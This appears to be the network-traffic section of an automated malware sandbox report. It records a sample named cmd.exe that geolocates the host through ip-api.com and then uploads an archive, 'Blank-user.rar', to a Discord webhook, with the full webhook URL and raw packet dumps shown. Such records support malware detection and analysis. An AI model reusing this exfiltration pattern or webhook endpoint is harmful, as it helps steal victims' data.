                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.305057049 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.305057049 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.305074930 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.305105925 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306137085 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306174040 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306574106 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306610107 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306786060 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306806087 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306833029 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306843996 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306938887 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.306952000 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307058096 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307075977 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307084084 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307092905 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307106972 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307118893 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307255983 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307269096 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307347059 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307354927 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307373047 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307379961 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307395935 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307413101 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307434082 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307441950 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307459116 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307466030 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307516098 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307539940 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307832003 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307843924 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307905912 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307917118 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307933092 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307940960 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307957888 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.307974100 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308094978 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308110952 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308156013 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308176994 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308248043 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308265924 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.308410883 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351349115 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351608992 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351623058 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351690054 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351700068 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351721048 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351727962 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351743937 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351753950 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351766109 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351775885 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351795912 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351804018 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351814032 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351820946 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351836920 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351843119 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351857901 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351866007 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351887941 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351954937 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351974010 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.351990938 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:35.395334005 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.405719042 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.405908108 CET44349748162.159.128.233192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.405989885 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.406497955 CET49748443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.739331007 CET4974780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.859596014 CET8049747208.95.112.1192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:40.859656096 CET4974780192.168.2.4208.95.112.1

                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.104846001 CET6000753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.247494936 CET53600071.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:33.868581057 CET5695453192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.008208990 CET53569541.1.1.1192.168.2.4

                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.104846001 CET192.168.2.41.1.1.10xfbeStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:33.868581057 CET192.168.2.41.1.1.10xc287Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.247494936 CET1.1.1.1192.168.2.40xfbeNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.008208990 CET1.1.1.1192.168.2.40xc287No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.008208990 CET1.1.1.1192.168.2.40xc287No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.008208990 CET1.1.1.1192.168.2.40xc287No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.008208990 CET1.1.1.1192.168.2.40xc287No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:34.008208990 CET1.1.1.1192.168.2.40xc287No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                    • discord.com
                                                                                                                                                                                                                                    • ip-api.com

                                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.449747208.95.112.1807280C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:32.374985933 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                    User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                    Nov 23, 2024 19:44:33.540514946 CET379INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 18:44:33 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 202
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-75.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.75"}


                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.449748162.159.128.2334437280C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC302OUTPOST /api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0 HTTP/1.1
                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                    Content-Length: 699973
                                                                                                                                                                                                                                    User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=deddcaf575f75e2dd616d5b567df1560
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 2d 2d 64 65 64 64 63 61 66 35 37 35 66 37 35 65 32 64 64 36 31 36 64 35 62 35 36 37 64 66 31 35 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 84 bb 11 d4 21 04 00 00 01 0f c4 e8 86 33 e8 29 00 46 81 42 d6 35 2e 24 9b f9 44 54 5c df 3f 81 fc f3 44 90 f8 2f 8f d9 f6 4f cc 12 30 7b 08 77 71 14 fd 84 41 e4 a4 de dd 8b 8f 1b 70 4f e9 eb 0f ca 37 ec c9 bf 45 c2 5f 36 38 e4 99 90 bd ad e2 da 75 96 41 01 0f 2c d6 ed 26 c6 de 6a bd b3
                                                                                                                                                                                                                                    Data Ascii: --deddcaf575f75e2dd616d5b567df1560Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!3)FB5.$DT\?D/O0{wqApO7E_68uA,&j
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: a8 a0 27 94 8e 5f f9 83 fc ca 62 15 d6 2b b7 1b ca 47 90 7d 4e 60 f3 a2 cf 7f 47 98 0a d5 94 50 06 98 62 6d 75 98 f3 48 0d 79 47 ef 0f 86 f2 de 56 ed 42 c3 6c c7 c2 31 b9 90 95 54 84 92 d0 bc 1f 63 1f 10 43 31 50 21 9f 85 d7 16 56 0e 65 68 15 96 b7 61 fe ad 67 91 8c 1d ce c8 bd ec c4 b1 5a 52 b5 6d ef a0 82 c5 e5 12 86 8e 09 2f d9 0a ab 75 37 82 8b 7c 57 6e 37 aa 7c 36 de 88 b6 e0 9f 4e 94 d9 a6 5d 7f 9d 1b be 1e eb 53 7a 08 a8 ec 8f 81 88 f0 88 83 ec 84 c3 9b b4 31 7e 7a fa 6d ee 78 4c 21 24 fb 77 da 42 4a 55 68 f0 86 b0 0e 71 d4 4c ed 39 45 42 3a 43 b7 88 f6 35 cf ab 56 b6 17 f5 e7 d5 73 16 9d 7e 93 7c 35 3a de a9 38 f1 52 d4 5b d9 05 ac e9 c2 4f 6f 84 9b 27 7b f9 01 b2 5b 2e f7 ec 3e da a9 04 5e d5 26 a0 8d 44 73 f3 88 a3 8f 64 61 d6 88 e3 44 16 79 f6
                                                                                                                                                                                                                                    Data Ascii: '_b+G}N`GPbmuHyGVBl1TcC1P!VehagZRm/u7|Wn7|6N]Sz1~zmxL!$wBJUhqL9EB:C5Vs~|5:8R[Oo'{[.>^&DsdaDy
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 7c 22 d4 25 5e 14 fe 54 09 52 96 41 f2 7d 0c 10 74 47 62 35 ab 9b 0a 55 65 68 0a be 37 cf 06 08 c5 d8 39 46 21 a0 ae 5b 15 cd 0e f1 a0 16 fb 96 bd c0 47 78 74 90 65 03 f5 86 0b 36 91 7b 96 43 06 37 3e 3c 6b 8b f9 4f bf 5a b3 62 12 29 c0 ac d0 2d 5e 7d 73 4d 24 cf 86 31 3e cf 21 a0 d7 40 e7 58 7a 03 cf bd 6f db a6 c9 fe 73 f0 ec e8 d2 72 cc 93 fe a2 6d 41 31 71 dc 29 9e ff 47 8b 71 eb 64 16 de 26 b8 de dd 68 63 b8 9c dc 90 56 77 51 3f b3 3c bb 62 38 8f 3f 71 13 b0 1c f8 fd e9 c4 45 41 14 a4 01 01 8c 5b d5 1e 94 88 1c 1b c7 89 8e a4 6e 7e e4 ed ef 74 0e d2 74 0a 30 f4 5b 5a 3b 00 00 8c 40 95 ac 4b eb cb 30 3c fe 13 54 75 e0 83 01 15 aa 68 65 92 8d 8a 9b b2 d3 c5 bb 0b 91 c1 30 e3 c7 a6 c7 e5 5c d6 be 7a 86 0e 00 02 20 86 09 41 14 9d 06 bf 39 bc a2 c6 87 70
                                                                                                                                                                                                                                    Data Ascii: |"%^TRA}tGb5Ueh79F![Gxte6{C7><kOZb)-^}sM$1>!@XzosrmA1q)Gqd&hcVwQ?<b8?qEA[n~tt0[Z;@K0<Tuhe0\z A9p
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 69 a4 83 55 ef f0 ed 3a 47 88 de c0 5d 22 e6 d7 a9 c9 01 32 20 cb 80 22 47 f7 6d da d2 50 bf 07 9d 94 e9 69 91 46 2e ef 4d c6 40 f0 8b 61 37 65 27 ba 80 e8 bf 11 22 51 8d a1 58 a8 07 94 5d c4 ac 8e 39 18 71 a2 8d 0a 08 56 fe 22 1e af bf 60 25 a0 ff 84 db 96 3a c4 02 4c 87 a5 70 ce c0 a9 94 51 42 2e ff de ea 3e 28 13 00 62 45 4e 48 d3 34 f7 a0 0b 7d 5b 77 54 da d8 fb 39 d1 a5 70 9f 5d 48 02 9f c7 9c 39 c7 ef 09 7c ef 70 37 f6 5c 02 cd 10 5a 7c be 92 b6 0d 0d c2 60 f9 90 50 b7 c1 48 dd d7 db f7 22 26 65 a4 f0 8d e1 f2 a4 0f 8d 9d b7 f3 6e 8e f5 67 b9 d8 15 e1 81 4d 1e 3b fc 3f a4 d1 1c f6 81 5a 6a 0f e2 d5 df 72 ed 97 7a 75 e6 0d 97 ed da 3b a6 c2 98 f8 61 76 70 ea ee ed 18 e5 14 1d f7 4c 03 d9 26 c8 3e e4 9f 51 0b 40 4a d1 f4 37 a9 dc 5f 5d 9d 1c 01 8d 19
                                                                                                                                                                                                                                    Data Ascii: iU:G]"2 "GmPiF.M@a7e'"QX]9qV"`%:LpQB.>(bENH4}[wT9p]H9|p7\Z|`PH"&engM;?Zjrzu;avpL&>Q@J7_]
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 3a 67 1d e9 5f e6 2b cc 7a 3a cf ad a4 e0 9f df 79 38 3a 20 60 82 27 5c a6 b9 c5 68 14 e2 7d 5d dd 8f 82 9d 4d b6 96 23 19 4e 5c 71 2f ba 40 e3 d6 b5 0e 6b 11 2a 30 fb a5 18 de a4 1d ba aa 9c 86 bf 92 f0 79 55 90 b7 97 e8 36 0e 7e e9 31 b3 6a 2f 1a c0 02 28 37 a0 49 b6 4c 38 60 d0 f8 74 96 18 b5 92 d0 67 97 38 3e 71 1b ad 30 db 44 74 58 3f cb 67 7c d9 8e 01 9f 45 67 70 3e cb 1e 1b 8d 9c 60 a6 f8 87 cf 7d 08 96 b3 e8 26 d2 96 9d 3f b2 2f d0 f8 4d 5d e2 b1 48 a8 a0 2e df 8d f1 9b 7e 29 8d a1 74 fc 47 0f 59 61 39 fb 64 cd 01 1c 7e 3e 1b fe fa 37 bb 26 36 f7 d7 38 80 dc 41 a2 23 06 18 af dc 5a 2e 5b c8 ad 3c 84 05 e1 8a 06 f3 d7 ec 21 f6 a9 84 40 a8 dc e3 05 af 64 77 85 6b cf 5e 1d 5c 21 a0 d0 a8 10 ff 02 c8 f7 2a d9 c5 80 24 76 90 94 a3 be e5 b5 ab 9e f8 2e
                                                                                                                                                                                                                                    Data Ascii: :g_+z:y8: `'\h}]M#N\q/@k*0yU6~1j/(7IL8`tg8>q0DtX?g|Egp>`}&?/M]H.~)tGYa9d~>7&68A#Z.[<!@dwk^\!*$v.
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 98 59 69 9a d5 2b e6 3c f8 ee bd 41 56 11 92 7d 48 ce 2e 11 36 8e 65 5c c4 dd 86 b2 f0 80 7b 7f 18 18 35 2b 9b d0 77 03 1b 4a 3a 7d db 01 f3 a2 3f be 84 22 7d d8 82 a8 4f fa ae b0 b8 dd c3 5a 55 ab 95 7a 10 fe 74 f3 0c 5b dc 33 a7 6c cb db e3 7b d4 c8 18 49 62 5e ed d7 71 f2 81 65 fe 10 ad 40 fb b7 7f c7 5c b5 b5 5a d4 1d d5 e1 44 eb 06 a5 79 c0 12 95 82 eb bd ff c1 69 af df b8 ea 9d 99 9e 35 cf 73 7b 6a 09 a3 75 8b 40 20 ae 5d bb 7f f3 d5 79 a8 74 24 52 e6 30 eb 65 a0 8b e5 1f 7b a3 55 b3 be 7c d0 c0 9e ce 87 fe e2 e7 24 6c be 0a fc 3e 75 62 24 d7 46 46 49 10 0b 83 32 fa 6d 42 58 40 7d a0 ea 77 49 33 3c 12 ae 1b 67 dd 4f 90 e2 bb 4d e2 58 c2 7d 35 7f 80 43 06 70 9e a6 e4 39 2c 6b 72 ed a6 24 93 68 8c c1 c5 e9 db 17 f7 09 7e ef fb 08 cd 83 95 1f b6 d6 08
                                                                                                                                                                                                                                    Data Ascii: Yi+<AV}H.6e\{5+wJ:}?"}OZUzt[3l{Ib^qe@\ZDyi5s{ju@ ]yt$R0e{U|$l>ub$FFI2mBX@}wI3<gOMX}5Cp9,kr$h~
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 83 37 fa 02 90 6e c8 4e 43 1b 00 54 01 93 cd 6b 36 d0 05 1c d9 6e 80 2b 25 57 33 aa 39 b7 f6 fa 38 d1 c9 fb 87 8c d1 4b 7f ce c8 03 91 f3 ab 5b a9 c6 8a 50 80 90 fa 0e b0 50 88 e4 49 23 d5 f3 a3 44 73 b6 f7 65 b6 82 39 8d 08 75 a1 07 f0 9f 0f 90 63 28 4e 72 e1 52 f0 8c 6c 4b 71 64 34 80 43 d5 bf 78 e0 73 4d fe 31 f1 d3 d0 17 43 b9 57 bc 0b a0 c3 dc 4d 52 4f d8 19 e0 51 33 5e a5 3d 1a 29 79 e8 b2 de e0 d0 cf 22 78 53 71 20 9e f7 c4 5b ae 7b 7b f1 71 d9 a9 45 69 81 92 ec d6 06 1f 3f 88 26 a7 7b 54 b5 57 a0 fa 88 ea 08 5f 4d 66 b4 92 25 8b f4 5c 0b ae 65 55 e2 c6 84 8a 97 9f 88 89 bd f3 8b d4 02 00 8b 6d 63 9b 62 14 eb 20 f8 18 3b 7b b1 32 60 1a 56 6c f3 e4 df d8 7b 37 4c d0 16 24 c9 1e 56 af 29 92 f0 18 59 dd 06 06 6d 61 55 94 5a f7 cf cf 17 24 40 e8 83 21
                                                                                                                                                                                                                                    Data Ascii: 7nNCTk6n+%W398K[PPI#Dse9uc(NrRlKqd4CxsM1CWMROQ3^=)y"xSq [{{qEi?&{TW_Mf%\eUmcb ;{2`Vl{7L$V)YmaUZ$@!
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 29 0f fa a3 8f 43 ee 8e ae 10 6c 10 f6 95 f2 51 a6 29 a2 41 af 25 e2 23 f4 16 7d af 37 aa 31 d5 73 50 b0 1d 79 03 df 11 da f4 b0 f4 c7 bd 71 e0 bf 7e c6 5e eb 38 30 d2 08 9e 48 db 4b 2e 08 e7 7e 82 16 7b 6e ee 23 29 ab 74 d9 9b 8d 5d 28 c6 5e e1 4a 24 77 e0 22 d6 0d 16 6b 24 9f d6 ac 4d d7 bf 08 6b ab 83 2f 81 c9 f6 f6 21 49 df 5e 19 4e d9 99 03 65 52 8d 94 5c fc ba 20 7a 1d 4f aa 1f 4e 9e a6 4e 49 19 e3 de 01 c8 e9 6e fb 1e ea 90 d8 df 91 0e 7b fb 96 63 c4 5a 2b 25 3b 7f 23 81 c8 51 fc 4f ea f2 56 10 28 0e b6 39 02 7b c9 50 6d 91 6f 65 e6 66 48 c9 97 38 14 0b 1e dc b9 a0 d8 9b 08 43 48 c7 02 f6 44 f3 27 f9 89 17 ae 27 2e c5 cd 0b ea 32 9c 10 f1 cb 84 2e bd 03 53 49 89 57 69 bd 8e d8 51 65 ae 33 5e 5c 35 3c 11 2e 7a cc a4 29 30 05 d0 15 f0 65 f4 00 75 ae
                                                                                                                                                                                                                                    Data Ascii: )ClQ)A%#}71sPyq~^80HK.~{n#)t](^J$w"k$Mk/!I^NeR\ zONNIn{cZ+%;#QOV(9{PmoefH8CHD''.2.SIWiQe3^\5<.z)0eu
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 03 35 35 1d ef 0f e7 00 04 75 48 29 66 22 63 c2 e0 65 03 13 4d 78 8e 3b 79 92 3b c3 0b 24 5d 16 6d e6 0b fd 46 fd 1b 99 3e 27 51 76 d8 61 0c 05 90 65 94 2a 81 55 03 f7 64 ce 51 90 d0 fc 72 e3 b0 cf 53 d7 08 63 d6 50 84 2e f1 c1 bd 1d f8 f9 9b 02 aa 47 7d 4a bb 9c 17 d3 07 bb 72 1d 6c d2 30 45 cc bc c0 2b 9d c9 b8 7f 3d 21 08 e0 20 58 45 f3 ef a3 48 c1 ac 47 18 37 77 f9 c1 87 16 f2 a4 5b fa bc 1a 8c e8 dc 78 68 35 c1 49 a4 19 da 49 1c 36 40 a9 b5 1e ab 01 d9 2b fc 8a 54 da 7e 97 e9 5f 70 dd 02 c2 15 3e 60 15 5a 18 51 db e0 0b 9c 80 c6 df 8d 52 2b 0b 3e 36 a5 a4 94 c0 ea e4 98 30 3c c2 bf 30 a6 7e 88 ba 87 bc 83 02 ab 98 e5 85 43 c1 d2 35 69 5a 2b 9d 1e 73 95 22 09 9e 10 2b a8 8d d5 42 31 db 16 51 97 7b 99 10 f3 4c 0f 01 0a 69 1b e6 55 31 06 b6 79 66 fd bb
                                                                                                                                                                                                                                    Data Ascii: 55uH)f"ceMx;y;$]mF>'Qvae*UdQrScP.G}Jrl0E+=! XEHG7w[xh5II6@+T~_p>`ZQR+>60<0~C5iZ+s"+B1Q{LiU1yf
                                                                                                                                                                                                                                    2024-11-23 18:44:35 UTC16384OUTData Raw: 23 69 be 92 18 e9 79 37 3a 02 64 99 e4 3c 94 6e c9 7a ce 70 45 ba 54 11 5f 31 70 5b b5 69 99 9e c5 0c c2 d2 aa 80 62 00 35 04 48 f8 35 ff 6a 5b 85 7f 63 6c 38 78 c8 96 70 b6 da 37 e5 5f d2 36 e2 49 2b c0 6c 4d 67 15 db af 91 1c 54 94 66 9f d3 a5 46 c4 57 d9 99 b3 7a 29 89 38 31 f4 01 2d f8 63 93 a6 df fd 0b f4 ff fa 64 f0 8e 36 c2 14 f6 d2 b6 31 66 5b 0d 16 74 3d 4c a6 d4 bf 10 63 ad b8 12 a7 52 e0 cb e4 14 7a 81 32 6d 7a d2 3b 70 57 e0 1e e7 f6 03 06 ee 57 8d 01 29 1d 93 2a 8d a2 07 51 5c ab 7e 4f 80 1d 45 ec 32 cc 83 e2 a1 16 47 45 f5 bc 4a 37 a8 00 3f a5 40 96 b8 22 98 3c b6 b5 f0 53 4a 3a 3d e9 0d 3b 89 60 9a bb 8a a4 45 39 cc d1 78 97 bd b9 d9 4d 1d d3 f4 c2 d8 cc 96 d9 34 52 f8 a0 2b b8 d0 13 c7 32 2f 26 81 c8 f4 c4 48 b8 a9 6c e5 5d 6e 28 ab e0 68
                                                                                                                                                                                                                                    Data Ascii: #iy7:d<nzpET_1p[ib5H5j[cl8xp7_6I+lMgTfFWz)81-cd61f[t=LcRz2mz;pWW)*Q\~OE2GEJ7?@"<SJ:=;`E9xM4R+2/&Hl]n(h
